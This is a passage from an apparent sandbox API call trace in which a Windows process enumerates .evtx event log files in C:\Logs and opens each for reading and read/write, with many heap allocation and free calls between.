InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.318] AreFileApisANSI () returned 1 [0071.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Key Management Service.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Key Management Service.evtx", lpUsedDefaultChar=0x0) returned 36 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.318] AreFileApisANSI () returned 1 [0071.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0071.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0071.319] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.319] GetFileType (hFile=0x428) returned 0x1 [0071.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.319] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.319] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.319] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.319] CloseHandle (hObject=0x428) returned 1 [0071.320] AreFileApisANSI () returned 1 [0071.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0071.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0071.320] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.320] GetFileType (hFile=0x428) returned 0x1 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.320] CloseHandle (hObject=0x428) returned 1 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.321] AreFileApisANSI () returned 1 [0071.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0071.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0071.321] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.448] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.448] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0071.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0071.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0071.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0071.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.449] AreFileApisANSI () returned 1 [0071.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", lpUsedDefaultChar=0x0) returned 56 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.450] AreFileApisANSI () returned 1 [0071.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0071.450] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.450] GetFileType (hFile=0x428) returned 0x1 [0071.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.450] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.450] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.451] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.451] CloseHandle (hObject=0x428) returned 1 [0071.451] AreFileApisANSI () returned 1 [0071.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0071.451] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.451] GetFileType (hFile=0x428) returned 0x1 [0071.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.451] CloseHandle (hObject=0x428) returned 1 [0071.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.452] AreFileApisANSI () returned 1 [0071.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0071.452] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.452] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0071.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x51398 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0071.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0071.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 